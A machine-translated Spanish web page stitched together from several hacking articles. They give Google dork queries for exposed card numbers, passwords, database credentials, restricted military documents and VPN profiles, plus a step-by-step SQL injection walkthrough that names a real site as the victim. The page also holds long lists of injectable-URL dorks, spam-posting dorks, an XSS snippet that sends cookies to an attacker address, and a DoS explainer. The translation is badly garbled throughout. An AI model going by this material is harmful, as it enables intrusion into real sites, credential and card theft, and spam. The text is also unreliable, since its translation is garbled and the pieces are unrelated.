Menú
Está libre
registrarse
el principal  /  Multimedia Inurl Artist View PHP ID. Instrucciones para usar la inyección de JSQL - Herramienta multifuncional para inyecciones de SQL de búsqueda y operación en Kali Linux

Inurl Artist View PHP ID. Instrucciones para usar la inyección de JSQL - Herramienta multifuncional para inyecciones de SQL de búsqueda y operación en Kali Linux

La obtención de datos privados no siempre significa piratería, a veces se publican en acceso común. Conocimiento configuración de Google Y un poco de latas le permitirá encontrar una gran cantidad de interesantes, desde los números de la tarjeta de crédito a los documentos del FBI.

Advertencia

Toda la información se proporciona únicamente con fines informativos. Ni los editores ni el autor son responsables de cualquier daño posible causado por los materiales de este artículo.

Hoy en día está conectado a Internet hoy, un poco preocupado por restringir el acceso. Por lo tanto, muchos datos privados se convierten en motores de búsqueda de minería. Robots: "Spiders" ya no se limitan a las páginas web, e indexas todo el contenido disponible en la red y se agrega constantemente a sus bases de datos que no pretenden divulgar información. Solo conoces estos secretos, solo necesitas saber cómo preguntar sobre ellos.

Estamos buscando archivos

En las manos hábiles, Google encontrará rápidamente todo lo que se encuentra mal en la red, por ejemplo, información personal y archivos de servicio. A menudo se ocultan como la llave debajo de la alfombra: no hay restricciones de acceso, los datos simplemente están acostados en los patios traseros del sitio donde los enlaces no conducen. La interfaz web de Google estándar proporciona solo ajustes básicos Búsqueda extendida, pero incluso ellos serán suficientes.

Limite la búsqueda de archivos de un tipo específico en Google usando dos operadores: FileType y Ext. El primero establece el formato que el motor de búsqueda ha definido el encabezado del archivo, el segundo es la extensión del archivo, independientemente de su contenido interno. Al buscar en ambos casos, solo necesita especificar la extensión. Inicialmente, la declaración EXT fue conveniente de usar en los casos en que las características específicas del formato de archivo estaban ausentes (por ejemplo, para buscar archivos de configuración INI y CFG, dentro de la cual todo puede ser). Ahora los algoritmos de Google han cambiado, y no hay diferencia visible entre los operadores: los resultados en la mayoría de los casos son los mismos.


Emisión de filtro

De forma predeterminada, las palabras y, en general, se han buscado los caracteres de Google ingresados \u200b\u200bpara todos los archivos en las páginas indexadas. Puede limitar el área de búsqueda por dominio. nivel superior, Sitio específico o en la ubicación de la secuencia deseada en los archivos en sí. Para las dos primeras opciones, se utiliza la instrucción del sitio, después de lo cual se ingresa el nombre de dominio o el sitio seleccionado. En el tercer caso, todo un conjunto de operadores le permite buscar información en los campos de oficina y los metadatos. Por ejemplo, allinurl eliminará los enlaces especificados en el cuerpo, Allinanchor, en el texto equipado con la etiqueta , AllIntitle: en los titulares de las páginas, AllIntext, en el cuerpo de las páginas.

Para cada operador, hay una versión ligera con un nombre más corto (sin una consola. La diferencia es que allinurl eliminará los enlaces con todas las palabras, e inurl solo es con el primero de ellos. La segunda y las palabras posteriores de la consulta pueden ocurrir en las páginas web en cualquier lugar. El operador inurl también tiene diferencias de otro significado similar: sitio. El primero también le permite encontrar cualquier secuencia de caracteres en la referencia al documento deseado (por ejemplo, / CGI-Bin /), que se usa ampliamente para buscar componentes con vulnerabilidades conocidas.

Intentemos en la práctica. Tomamos el filtro de AllIntext y hagamos que la solicitud le da la lista de números y códigos de verificación de tarjetas de crédito, cuya validez caduque solo en dos años (o cuando sus propietarios se cansen de alimentarlos en una fila).

AllIntext: Número de tarjeta Fecha de vencimiento / 2017 CVV

Cuando lees en la noticia de que el joven hacker "hackeaba los servidores" de Pentágono o NASA, mirando la información secreta, luego, en la mayoría de los casos, se trata de una técnica elemental para usar Google. Supongamos que estamos interesados \u200b\u200ben la lista de empleados de la NASA y sus datos de contacto. Seguramente tal lista está en forma electrónica. Por conveniencia o por abrumador, puede estar en el sitio en sí. Es lógico que, en este caso, no se enlaces, ya que está destinado al uso interno. ¿Qué palabras pueden estar en tal archivo? Al menos, el campo "Dirección". Compruebe que todas estas suposiciones son más fáciles que simples.


Inurl: NASA.GOV FILETIPE: XLSX "Dirección"


Utilizamos la burocracia

Los hallazgos similares son una pequeña cosa bonita. La captura verdaderamente sólida proporciona un conocimiento más detallado de los operadores de Google para los webmasters, la propia red y las características de la estructura del deseado. Saber detalles, puede filtrar fácilmente la emisión y aclarar las propiedades de los archivos deseados para que en el resto para obtener datos realmente valiosos. Es gracioso que la burocracia llegue al rescate. Crea una redacción típica, para la cual es conveniente buscar una información secreta de posibilidades.

Por ejemplo, una declaración de distribución es obligatoria en la Oficina del Departamento de Defensa de los Estados Unidos, significa restricciones estandarizadas en la distribución de documentos. Litera un marcado lanzamientos públicos, en los que no hay nada secreto; B: destinado al uso interno, C es estrictamente confidencial y, por lo tanto, a F. por separado, vale la pena la letra X, que marca una información particularmente valiosa que representa el misterio estatal del nivel más alto. Permita que dichos documentos estén buscando a aquellos que deben hacerse en la deuda del servicio, y estamos limitados a archivos con C. De acuerdo con la directiva DODI 5230.24, dicha marca se asigna a los documentos que contienen una descripción de las tecnologías críticas que se encuentran bajo exportación. control. Puede detectar información tan cuidadosamente protegida en los sitios en el dominio de nivel superior. Mil asignado para el Ejército de los EE. UU.

"Distribución de distribución C" inurl: Navy.mil

Es muy conveniente que solo los sitios web de los EE. UU. MO y sus organizaciones de contratos se recopilen en el dominio de dominio. La búsqueda de una restricción de dominio es extremadamente limpia, y los titulares, se hablan por sí mismos. Búsqueda De esta manera, los secretos rusos son casi inútiles: el caos reina en Domains.RU, y los nombres de muchos sistemas de armas suenan como botánico (PP "Kiparis", ACS "acacia") o en absoluto fabuloso (TOS "Buratino").


Examinando cuidadosamente cualquier documento del sitio en el dominio de.Mil, se pueden ver otros marcadores para refinar la búsqueda. Por ejemplo, referencia a las restricciones de exportación "SEC 2751", que también es conveniente para buscar información técnica interesante. De vez en cuando se toma de los sitios oficiales, donde una vez se iluminó, por lo que si la búsqueda de extradición no logra continuar por un enlace interesante, use el google efectivo (operador de caché) o el sitio de archivo de Internet.

Subimos a las nubes

Además de los documentos desclasificados accidentalmente de los departamentos gubernamentales, en Kesche Google, a veces hace referencia a los enlaces a archivos personales de Dropbox y otros servicios de almacenamiento que crean referencias "privadas" a datos publicados públicamente. Con servicios alternativos y caseros aún peor. Por ejemplo, la siguiente consulta encuentra los datos de todos los clientes de Verizon, en los que se instala el servidor FTP en el enrutador.

Allinurl: ftp: // verizon.net

Estas personas inteligentes ahora encontraron más de cuarenta mil, y en la primavera de 2015 fueron un orden de magnitud más. En lugar de verizon.net, puede sustituir el nombre de cualquier proveedor famoso, y lo que se conocerá, más grande puede haber una captura. A través del servidor FTP incorporado, los archivos son visibles en la unidad externa conectada al enrutador. Por lo general, es NAS para el trabajo remoto, la nube personal o un poco de silla de mecedora de pirificación. Todos los contenidos de dichos medios están indexados por Google y otros motores de búsqueda, por lo que puede acceder a los archivos almacenados en discos externos por directo.

Estamos espiando las configuraciones

Antes de las nubes a las nubes, los servidores FTP simples en los que también hubo suficientes vulnerabilidades también contaron las nubes como almacenes remotos. Muchos de ellos son relevantes hasta ahora. Por ejemplo, los populares datos de configuración del programa de WS_FTPP, las cuentas de usuario y las contraseñas se almacenan en el archivo ws_ftp.ini. Es fácil de encontrar y leer, ya que todos los registros se almacenan en un formato de texto, y las contraseñas están encriptadas por el algoritmo de Triple des luego de la ofuscación mínima. En la mayoría de las versiones, es suficiente para descartar el primer byte.

Desciphere dichas contraseñas son fáciles utilizando la utilidad de descifrado de contraseña de WS_FTP o servicio web gratuito.

Hablando de piratear un sitio arbitrario, generalmente implica una contraseña de los registros y las copias de seguridad de los archivos o aplicaciones de configuración de CMS para comercio electrónico. Si conoce su estructura típica, puede especificar fácilmente indicio. Las filas como las que se encuentran en ws_ftp.ini son extremadamente comunes. Por ejemplo, en Drupal y PrestaShop, hay una ID de usuario (UID) y la contraseña correspondiente (PWD), y toda la información en los archivos con extensión se almacena .inc. Búscalos de la siguiente manera:

"pwd \u003d" "uid \u003d" ext: inc

Revelar contraseñas de DBMS

En los archivos de configuración, nombres y direcciones de SQL Server correo electrónico Los usuarios están almacenados en video abierto, en lugar de contraseñas, su HISI MD5 está grabado. Para descifrarlos, estrictamente hablando, es imposible, sin embargo, puede encontrar el cumplimiento entre una conocida contraseña de hash de vapor.

Todavía hay bases de datos que ni siquiera usan la contraseña. Los archivos de configuración de cualquiera de ellos se pueden ver simplemente en el navegador.

Intext: db_password filetype: env

Con el advenimiento de servidores de Windows El lugar de los archivos de configuración en parte ocuparon el registro. La búsqueda por sus sucursales puede ser exactamente de la misma manera utilizando el Reg que un tipo de archivo. Por ejemplo, como este:

FILETYPE: REG HKEY_CURRENT_USER "CONTRASEÑA" \u003d

No te olvides de lo obvio.

A veces llegar a información cerrada Es posible con la ayuda de abierta accidentalmente y en el campo de la vista. Datos de Google. La opción perfecta es encontrar una lista de contraseñas en cualquier formato común. Tienda de información de la cuenta en archivo de texto., palabra de documento o electrónico mesa de Excel Solo las personas desesperadas pueden, pero solo las bastantes.

FILETYPE: XLS INURL: CONTRASEÑA

Por un lado, hay muchos medios para prevenir tales incidentes. Debe especificar los derechos de acceso adecuados a HTACCESS, PATT CMS, no use los scripts izquierdos y cierre otros agujeros. También hay un archivo con una lista de excepciones de robots.txt, que prohíbe que los motores de búsqueda indexan los archivos y directorios especificados en ella. Por otro lado, si la estructura de Robots.txt en algún servidor difiere del estándar, de inmediato queda claro que están tratando de ocultarlo.

La lista de directorios y archivos en cualquier sitio está precedida por el índice de inscripción estándar de. Dado que debe cumplir en el título con fines de servicio, tiene sentido limitar su búsqueda por parte del operador del intitillo. Las cosas interesantes están en los directorios / admin /, / personal /, / etc /, e incluso / secreto /.

Sigue las actualizaciones

La relevancia es muy importante aquí: las viejas vulnerabilidades se cierran muy lentamente, pero Google y su emisor de búsqueda están cambiando constantemente. Hay una diferencia incluso entre el filtro "Último segundo" (& TBS \u003d QDR: S al final de la solicitud) y "Tiempo real" (& TBS \u003d QDR: 1).

Fecha de intervalo de tiempo última actualización El archivo de Google también se indica implícitamente. A través de la interfaz web gráfica, puede elegir uno de los períodos estándar (hora, día, semana, etc.) o configurar el rango de fechas, pero este método no es adecuado para la automatización.

Por la vista dirección Solo puede adivinar la forma de limitar la salida de los resultados usando & TBS \u003d QDR:. La letra Y después de que establece el límite de un año (y TBS \u003d QDR: Y), M muestra los resultados del último mes, W - para la semana, D - durante el día pasado, H - para ultima hora, n - por minuto, y S - por segundo. Los resultados más frescos que se han convertido en famosos Google están usando el filtro y las TBS \u003d QDR: 1.

Si desea escribir un script astuto, será útil saber que el rango de fechas se establece en Google en formato Julian a través de la Declaración de Daterange. Por ejemplo, aquí puedes encontrar una lista. documentos PDF Con la palabra confidencial, descargada del 1 de enero al 1 de julio de 2015.

Filetipo confidencial: PDF Daterange: 2457024-2457205

El rango se indica en el formato de las fechas de Julian sin tener en cuenta la parte fraccional. Traducirlos manualmente del calendario gregoriano es inconveniente. Es más fácil usar el convertidor de fechas.

Dirigirse y filtrar de nuevo

Además de especificar operadores adicionales en la consulta de búsqueda, puede enviar directamente en el organismo de enlace. Por ejemplo, aclarar el tipo de archivo: PDF corresponde al diseño as_filetype \u003d PDF. Por lo tanto, es conveniente establecer cualquier aclaración. Supongamos que la emisión de resultados solo de la República de Honduras se otorga agregando CR \u003d Countryhn a la URL de búsqueda, y solo desde la ciudad de Bogbruisk - GCS \u003d Bogruisk. En la sección del desarrollador puede encontrar una lista completa.

Los medios de automatización de Google están diseñados para aliviar la vida, pero a menudo agregan problemas. Por ejemplo, por IP del usuario a través de WHOIS está determinado por su ciudad. Sobre la base de esta información en Google, la carga entre servidores no solo está equilibrada, sino que también cambia los resultados de los resultados de búsqueda. Dependiendo de la región, con la misma consulta, se caerán diferentes resultados en la primera página, y algunos de ellos pueden estar ocultos. Sentirse de un cosmopolita y buscar información de cualquier país ayudará a su código de dos letras después de la directiva GL \u003d país. Por ejemplo, el Código de Países Bajos - NL, y el Vaticano y Corea del Norte en Google no están permitidos.

A menudo, la búsqueda de emisión resulta que se establezca incluso después de usar varios filtros avanzados. En este caso, es fácil aclarar la solicitud agregando algunas excepciones (antes de cada una de ellas es un signo menos). Por ejemplo, de acuerdo con personal, banca, nombres y tutoriales a menudo se utilizan. Por lo tanto, los resultados de búsqueda más puros no mostrarán un ejemplo de Curcent de una solicitud, sino un refinado:

Intitle: "Índice de / personal /" -names -tutorial -banking

Un ejemplo es finalmente

El sofisticado hacker se caracteriza por asegurarse con todo lo necesario por su cuenta. Por ejemplo, VPN es una cosa conveniente, pero costosa o temporal y limitaciones. Prepare una suscripción para usted, uno demasiado caro. Es bueno que haya suscripciones grupales, y con la ayuda de Google, es fácil convertirlo en parte de algún grupo. Para hacer esto, es suficiente encontrar el archivo de configuración de Cisco VPN, que tiene una extensión PCF bastante no estándar y una ruta reconocible: archivos de programa \\ Cisco Systems \\ VPN Client \\ Perfiles. Una solicitud, y entras, por ejemplo, en un equipo amigable de la Universidad de Bonn.

FILETYPE: PCF VPN o grupo

Información.

Google encuentra archivos de configuración Con contraseñas, pero muchas de ellas están escritas en forma cifrada o reemplazadas por hash. Si ve las filas de longitud fija, entonces el servicio de descifrado está buscando de inmediato.

Las contraseñas se almacenan en un formulario cifrado, pero Maurice Massar ya ha escrito un programa para su descifrado y lo proporciona de forma gratuita a través de Thecampusgeeks.com.

Para ayuda de Google Se realizan cientos diferentes tipos Ataques y pruebas de penetración. Hay muchas opciones que afectan a programas populares, los principales formatos de la base de datos, numerosas vulnerabilidades PHP, nubes, etc. Si se asegura de que está buscando, simplificará en gran medida a obtener la información necesaria (especialmente la que no planeó hacer la propiedad universal). ¡No se alimenta a SHODAN Ideas interesantes, pero cada base de recursos de red indexados!

Y así, ahora te diré cómo sin ningún conocimiento de algo para hackear algo. Digo de inmediato, los beneficios de este pequeño, pero aún así.
Para empezar, necesitas encontrar los sitios. Por esto vamos a Google.com y estamos buscando.

Inurl: pageid \u003d inurl: games.php? ID \u003d inurl: Página. FPHP? Archivo \u003d inurl: NewsDetail.php? ID \u003d inurl: Gallery.php? ID \u003d inurl: article.php? Id \u003d inurl: show.php? ID \u003d inurl: staff_id \u003d inurl: newsitem.php? num \u003d inurl: readnews.php? id \u003d inurl: top10.php? cat \u003d inurl: historleer.php? num \u003d inurl: reagir.php? num \u003d inurl: stray- Preguntas-View.php? Num \u003d inurl: forum_bds.php? Num \u003d inurl: game.php? ID \u003d inurl: view_product.php? Id \u003d inurl: newsone.php? Id \u003d inurl: sw_comment.php? Id \u003d inurl: News.php? ID \u003d inurl: avd_start.php? avd \u003d inurl: event.php? id \u003d inurl: producto-item.php? id \u003d inurl: sql.php? id \u003d inurl: news_view.php? id \u003d inurl: select_biblio.php? ID \u003d inurl: humor.php? ID \u003d inurl: sobrebook.php? ID \u003d inurl: ogl_inet.php? Ogl_id \u003d inurl: fiche_spectacle.php? ID \u003d inurl: commercique_detail.php? id \u003d inurl: SEM. php3? id \u003d inurl: kategorief.php4? id \u003d inurl: news.php? ID \u003d inurl: index.php? id \u003d inurl: faq2.php? id \u003d inurl: show_an.php? id \u003d inurl: Preview.php? ID \u003d inurl: loadpsb.php? id \u003d inurl: opinion.php? id \u003d inurl: spr.php? id \u003d inurl: pages.php? id \u003d inurl: anuten.php? id \u003d inurl: clanek.php4? id \u003d I. NURL: Participant.php? ID \u003d inurl: descarga.php? ID \u003d inurl: main.php? id \u003d inurl: review.php? id \u003d inurl: chappies.php? id \u003d inurl: read.php? id \u003d inurl: prod_detail.php? ID \u003d inurl: Viewphoto.php? ID \u003d inurl: article.php? id \u003d inurl: person.php? id \u003d inurl: productinfo.php? id \u003d inurl: showimg.php? id \u003d inurl: ver. PHP? ID \u003d inurl: sitio web.php? ID \u003d inurl: hosting_info.php? id \u003d inurl: gallerl.php? id \u003d inurl: rub.php? iDr \u003d inurl: view_faq.php? id \u003d inurl: artikelinfo.php? ID \u003d inurl: detalle.php? ID \u003d inurl: index.php? \u003d inurl: perfil_view.php? ID \u003d inurl: categoría.php? ID \u003d inurl: publications.php? ID \u003d inurl: Fellows.php? ID \u003d inurl : descargues_info.php? ID \u003d inurl: prod_info.php? id \u003d inurl: shop.php? do \u003d part & id \u003d inurl: productinfo.php? id \u003d inurl: collectionitem.php? ID \u003d inurl: band_info.php? id \u003d Inurl: producto.php? ID \u003d inurl: lanzamientos.php? ID \u003d inurl: ray.php? Id \u003d inurl: produit.php? Id \u003d inurl: pop.php? Id \u003d inurl: shoppop.php? Id \u003d inurl : PRODUCTEDETAIL .PHP? ID \u003d INURL: POST.PHP? ID \u003d inurl: viewshowdetail.php? ID \u003d inurl: clubpage.php? Id \u003d inurl: memberinfo.php? Id \u003d inurl: send.php? Id \u003d en URL: TEMA.PHP? ID \u003d INURL: PAGE.PHP? ID \u003d INURL: Shredder-Categors.php? ID \u003d inurl: tradecategory.php? ID \u003d inurl: product_ranges_view.php? ID \u003d inurl: shop_category.php? Id \u003d inurl: transcript.php? id \u003d inurl: canal_id \u003d inurl: item_id \u003d inurl: newsid \u003d inurl: entrenadores.php? id \u003d inurl: noticias-full.php? id \u003d inurl: news_display.php? getid \u003d inurl: index2. PHP? Opción \u003d inurl: readnews.php? ID \u003d inurl: top10.php? cat \u003d inurl: newsone.php? id \u003d inurl: event.php? id \u003d inurl: producto-item.php? id \u003d inurl: sql. PHP? ID \u003d inurl: sobrebook.php? ID \u003d inurl: Preview.php? ID \u003d inurl: loadpsb.php? ID \u003d inurl: Pages.php? ID \u003d inurl: material.php? id \u003d inurl: clanek.php4? ID \u003d inurl: anuance.php? id \u003d inurl: chappies.php? ID \u003d inurl: read.php? id \u003d inurl: viewapp.php? id \u003d inurl: viewphoto.php? id \u003d inurl: rub.php? iDr \u003d Inurl: galeri_info.php? L \u003d inurl: review.php? ID \u003d inurl: iniziativa.php? En \u003d inurl: curriculum.php? Id \u003d inurl: etiquetas.php? ID \u003d inurl: historia.php? Id \u003d inurl: Look.php? ID \u003d inurl: newsone.php? ID \u003d inurl: sobrebook.php? ID \u003d inurl: material.php? Id \u003d inurl: opinion.php? Id \u003d inurl: anuance.php? ID \u003d inurl: rub.php? IDr \u003d inurl: galeri_info.php? l \u003d inurl: tekst.php? IDT \u003d inurl: newscat.php? id \u003d inurl: neststicker_info.php? IDN \u003d inurl: rubrika.php? iDr \u003d inurl: rubp.php? iDr \u003d inurl: Offer.php? Idf \u003d inurl: art.php? Idm \u003d inurl: title.php? Id \u003d inurl: "php? Id \u003d 1" inurl: "php? Cat \u003d 1" inurl: "php? Catid \u003d 1" inurl : "PHP? NUM \u003d 1" INURL: "PHP? BID \u003d 1" INURL: "PHP? PID \u003d 1" INURL: "PHP? NID \u003d 1"

aquí hay una pequeña lista. Puedes usar el tuyo. Y así, encontramos el sitio. Por ejemplo, http://www.vestitambov.ru/
Siguiente, descarga este programa.

** Contenido oculto: Para ver este contenido oculto, su cuenta posterior debe ser 3 o más. **

Haga clic en Aceptar. Luego insertamos el sitio a la víctima.
Haga clic en Inicio. A continuación, estamos esperando los resultados.
Y así, el programa encontró la vulnerabilidad SQL.

Siguiente, Swing Havij, http://www.vestitambov.ru:80/index.php?module\u003dGroup_Programs&id_gp\u003d Inserte el enlace resultante allí. Explique cómo usar Havij y dónde no descargaré, no es difícil encontrarlo. Todo. Recibió los datos que necesita: la contraseña del administrador, y luego el caso ya es su imaginación.

PD Este es mi primer intento de escribir algo. Pido disculpas si algo está mal

Cómo buscarnos Cómo Google.com

Todo probablemente sepa usar tal buscadorComo Google \u003d), pero no todos saben que si realiza una consulta de búsqueda con la ayuda de diseños especiales, puede lograr los resultados de lo que está buscando mucho más eficiente y más rápido \u003d) en este artículo intentaré mostrar Lo que necesitas hacer para buscar correctamente.

Google admite múltiples operadores de búsqueda extendidos con significado especial al buscar google.com. Normalmente, estos operadores cambian la búsqueda, o incluso dicen Google para hacer completamente diferentes tipos Buscar. Por ejemplo, diseño enlace: es un operador especialy consulta enlace: www.google.com. No le dará una búsqueda normal, pero en su lugar encontrará todas las páginas web que tienen conexiones a Google.com.
Tipos alternativos de solicitudes.

cache: Si incluye otras palabras para solicitar, Google resaltará estas palabras incluidas dentro del documento en caché.
Por ejemplo, caché: www.site web Muestra contenido en caché con una palabra destacada "Web".

enlace: La consulta de búsqueda que se considera anteriormente mostrará las páginas web que contienen enlaces a la consulta especificada.
Por ejemplo: enlace: www.syt. Mostrar todas las páginas en las que hay un enlace a http: //www.site

relacionados: Mostrar páginas web "Similar" (relacionada) a la página web especificada.
Por ejemplo, relacionado: www.google.com. listará las páginas web que son similares página principal Google.

información: Información de solicitud: Presentaré información que Google tiene sobre la página web solicitada.
Por ejemplo, Información: Sitio Muestra información sobre nuestro foro \u003d) (Armada - Foro Adalt Webmasters).

Otras solicitudes de información

definir: Solicitud Define: proporcionará la definición de las palabras que ingresa después de que se recopilen de varias fuentes de red. La definición será para toda la frase ingresada (es decir, incluirá todas las palabras en la consulta exacta).

cepo: Si inicia una solicitud de acciones: Google manejará el resto del tiempo de consulta como símbolos de los informes de Exchange, y póngase en contacto con la página que muestra información lista Para estos personajes.
Por ejemplo, stocks: Intel Yahoo Mostrar información sobre Intel y Yahoo. (Tenga en cuenta que debe imprimir caracteres Últimas noticias, no nombre de la empresa)

Modificadores de consulta

sitio: Si se enciende: En su solicitud, Google limitará los resultados de los sitios web que se encuentran en este dominio.
También puede buscar zonas individuales como tales ru, org, com, etc. Sitio: com. sitio: RU.)

alliintitle: Si ejecuta una solicitud de AllIntitle:, Google limitará los resultados con todas las solicitudes de palabras en el título.
Por ejemplo, allIntitle: Búsqueda de Google Devuelve todas las páginas de Google buscando imágenes similares, Blog, etc.

intitle: Si activa intitle: en su solicitud, Google limitará los resultados de los documentos que contengan la palabra en el título.
Por ejemplo, intitle: Negocios

allinurl: Si ejecuta una solicitud de Allinurl: Google limitará los resultados, con todas las palabras en la URL.
Por ejemplo, allinurl: búsqueda de google Devuelve documentos con Google y busque en el título. Además, como opción, puede compartir las palabras Slash (/), las palabras en ambos lados de la barra se distinguen dentro de una página: Ejemplo allinurl: foo / bar

inurl: Si activa Inurl: en su solicitud, Google limitará los resultados de los documentos que contengan la palabra en la URL.
Por ejemplo, Animación inurl: sitio

en el texto: Búsquedas solo en el texto de la página, la palabra especificada, ignorando el título y los textos de referencia, y otros no relacionados con. También hay un derivado de este modificador. allIntext: esos. Además, todas las palabras en la solicitud se buscarán solo en el texto, que también es importante, ignorando las palabras de uso frecuente en los enlaces
Por ejemplo, intext: foro

rango de fechas: Búsquedas para el marco temporal (Daterange: 2452389-2452389), las fechas para el tiempo se indican en el formato Julian.

Bueno, todo tipo de ejemplos interesantes de solicitudes.

Ejemplos de consultas para Google. Para spammers

Inurl: control.guest? A \u003d signo

Sitio: Books.DrevenBook.com "Página de inicio URL" "Firmar mi" inurl: Signo

Sitio: www.freeegb.net Inicio

Inurl: firmar.asp "C. de personajes"

"Mensaje:" inurl: firm.cfm "remitente:"

Inurl: Register.php "Registro de usuario" "Sitio web"

Inurl: edu / libro de visitas "Firme el libro de visitas"

Inurl: Publicar "Publicar comentario" "URL"

Inurl: / Archivos / "Comentarios:" "¿Recuerdas la información?"

"Script y Libro de visitas creadas por:" "URL:" "Comentarios:"

Inurl :? Action \u003d Agregar "PHPBook" "URL"

Intitle: "Enviar nueva historia"

Revistas

Inurl: www.livejournal.com/users/ MODE \u003d Responder

Inurl greatestjournal.com/ modo \u003d responder

Inurl: fastbb.ru/re.pl?

Inurl: fastbb.ru /re.pl? "Libro de visitas"

Blogs

Inurl: blogger.com/comment.g? "Postid" "Anónimo"

Inurl: typepad.com/ "Publicar un comentario" "¿Recuerdas la información personal?"

Inurl: greatestjournal.com/community/ "Publicar comentario" "Direcciones de los carteles anónimos"

"Publicar comentario" "Direcciones de los carteles anónimos" -

Intitle: "Publicar comentario"

Inurl: Pirillo.com "Publicar comentario"

Foros

Inurl: gate.html? "Name \u003d Forums" "Mode \u003d Responder"

Inurl: "foro / posting.php? MODE \u003d Responder"

Inurl: "mes.php?"

Inurl: "miembros.html"

Inurl: foro / fiylist.php? "

Decidí hablar un poco sobre la seguridad de la información. El artículo será útil para los programadores novatos y aquellos que acaban de comenzar a participar en el desarrollo frontal. ¿Cuál es el problema?

Muchos desarrolladores novatos son tan aficionados a escribir el código que se olvidan por completo de la seguridad de sus obras. Y lo más importante, se olvide de tales vulnerabilidades como solicitud de SQL, XXS. E incluso inventar contraseñas ligeras para sus paneles administrativos y están sujetos a bruthfors. ¿Cuáles son estos ataques y cómo puedo evitarlos?

inyección SQL

La inyección de SQL es el tipo de ataque más común en la base de datos, que se lleva a cabo con una consulta SQL para un DBMS específico. Muchas personas sufren de tales ataques e incluso grandes compañias. Causa: error del desarrollador al escribir una base de datos y, en realidad, las consultas SQL.

El ataque de tipo incrustado SQL es posible debido al procesamiento incorrecto de los datos de entrada utilizados en las consultas de SQL. Con un pasaje exitoso del ataque por un hacker, usted corre el riesgo de perder no solo los contenidos de las bases de datos, sino también las contraseñas y los registros, respectivamente panel administrativo. Y estos datos serán suficientes para tomar por completo la posesión del sitio o hacer ajustes irreversibles.

El ataque se puede jugar con éxito en scripts escritos en PHP, ASP, PERL y otros idiomas. El éxito de tales ataques depende más de qué DBMS se usa y cómo se implementa el script en sí. Hay muchos sitios vulnerables en el mundo para las inyecciones de SQL. Esto es fácil de asegurar. Es suficiente para ingresar a "Dorki": estas son solicitudes especiales para la búsqueda de sitios vulnerables. Aquí hay algunos de ellos:

  • inurl: index.php? id \u003d
  • inurl: entrenadores.php? id \u003d
  • inurl: buy.php? Categoría \u003d
  • inurl: article.php? id \u003d
  • inurl: play_old.php? id \u003d
  • inurl: declaration_more.php? Decl_ID \u003d
  • inurl: pageid \u003d
  • inurl: games.php? Id \u003d
  • inurl: page.php? Archivo \u003d
  • inurl: newsdetail.php? id \u003d
  • inurl: gallery.php? id \u003d
  • inurl: article.php? id \u003d

¿Cómo usarlos? Simplemente ingrese en el motor de búsqueda de Google o Yandex. El motor de búsqueda no le dará solo un sitio vulnerable, sino también una página para esta vulnerabilidad. Pero no nos detendremos y nos aseguraremos de que la página sea realmente vulnerable. Para ello, es suficiente después del valor "id \u003d 1" para poner una sola cotización de "''. Algo como esto:

  • inurl: games.php? Id \u003d 1 '

Y el sitio nos dará un error acerca de solicitud de SQL. ¿Qué necesitas para continuar nuestro hacker?

Y luego lo necesita más enlace a la página con un error. Luego, trabaje en la vulnerabilidad en la mayoría de los casos ocurre en la distribución "Kali Linux" con sus utilidades en esta parte: la introducción del código de inyección y realice las operaciones necesarias. Cómo sucederá, no puedo decirte. Pero esto se puede encontrar información en internet.

Ataque XSS

Este tipo de ataque se lleva a cabo en archivos de cookies. Ellos, a su vez, les encanta salvar a los usuarios. ¿Por qué no? ¿Cómo sin ellos? Después de todo, gracias a las cookies, no conducimos una contraseña por cien veces desde vk.com o mail.ru. Y pocos de los que los niegan. Pero en Internet para hackers, a menudo aparece la regla: el coeficiente de conveniencia es directamente proporcional al coeficiente no seguro.

Para implementar el ataque XSS, nuestro hacker necesita conocimiento de JavaScript. El idioma a primera vista es muy simple e inofensivo, porque no tiene acceso a los recursos informáticos. Trabajar con JavaScript hacker solo puede en el navegador, pero esto es suficiente. Después de todo, lo principal para ingresar al código en la página web.

No hablaré en detalle sobre el proceso de ataque. Le diré solo lo básico y el significado de cómo sucede.

Hacker puede agregar en algún foro o libro de invitados JS-Code:

Los scripts nos enviarán en la página infectada donde se ejecutará el código: sea un sniffer, cualquier repositorio o explosión, que de otro modo secuestrará nuestras cookies del caché.

¿Por qué solo JavaScript? Porque JavaScript está perfectamente protegido con solicitudes web y tiene acceso a las cookies. Pero si nuestro guión nos lo traducirá a algún sitio, el usuario se notará fácilmente. Aquí, el hacker aplica una opción más astuta, solo entra en el código en la imagen.

Img \u003d nueva imagen ();

Img.src \u003d "http://192.168.1.7/sniff.php?" + Kdocument.cookie;

Simplemente creamos una imagen y atribuimos a él como dirección de nuestro guión.

¿Cómo protegerse de todo esto? Muy simple: no sigas enlaces sospechosos.

Ataques DOS y DDOS


DOS (de Ing. Denegación de servicio - falta de mantener) - Hacker Ataque en el sistema de computación para llevarlo al fracaso. Esta es la creación de tales condiciones bajo las cuales los usuarios de Bona Fide del sistema no pueden acceder a los proporcionados. recursos del sistema (servidores), o este acceso es difícil. La falla del sistema puede ser un paso hacia su captura si hay información crítica en el freelancer: por ejemplo, una versión, parte código de software Pero, pero la mayoría de las veces es una medida de la presión económica: una pérdida de un simple servicio que causa ingresos. Las cuentas del proveedor o las medidas de atención son tangibles, superan el "objetivo" en el bolsillo. En el presente, los ataques de DOS y DDOS son los más populares, ya que le permite traer casi cualquier sistema al fracaso, no dejar una evidencia legalmente significativa.

¿Cuál es la diferencia entre DOS del ataque de DDOS?

DOS es un ataque construido por una forma inteligente. Por ejemplo, si el servidor no verifica la exactitud de los paquetes entrantes, el pirata informático puede hacer que se procese una solicitud que se procese para siempre, y el tiempo del procesador no será suficiente para trabajar con otras conexiones. En consecuencia, los clientes recibirán una negativa a mantener. Pero sobrecargar o deshabilitar de tal manera, los sitios famosos grandes no funcionarán. Están en servicio con canales bastante amplios y servidores de trabajo pesados \u200b\u200bque lo hacen sin problemas para hacer frente a tal sobrecarga.

DDOS es en realidad el mismo ataque que DOS. Pero si en el paquete de solicitud de DOS One, entonces en DDOS puede muy de cientos y más. Incluso los servidores de servicio pesado pueden no hacer frente a tal sobrecarga. Yo daré un ejemplo.

El ataque de DOS es cuando estás tomando una conversación con alguien, pero hay algún tipo de persona no pública aquí y comienza a gritar en voz alta. Es imposible hablar o es muy difícil. Solución: Causa la seguridad que se calmará y llevó a una persona fuera de la habitación. Ataques de DDOS: esto es cuando hay una multitud concurrida de personas no compatibles. En este caso, la protección no podrá torcer todo y plomo.

DOS y DDOS se producen a partir de computadoras, llamadas zombies. Es un hacker-hacker computadoras de usuarios que ni siquiera sospechan que su automóvil está involucrado en el ataque de ningún servidor.

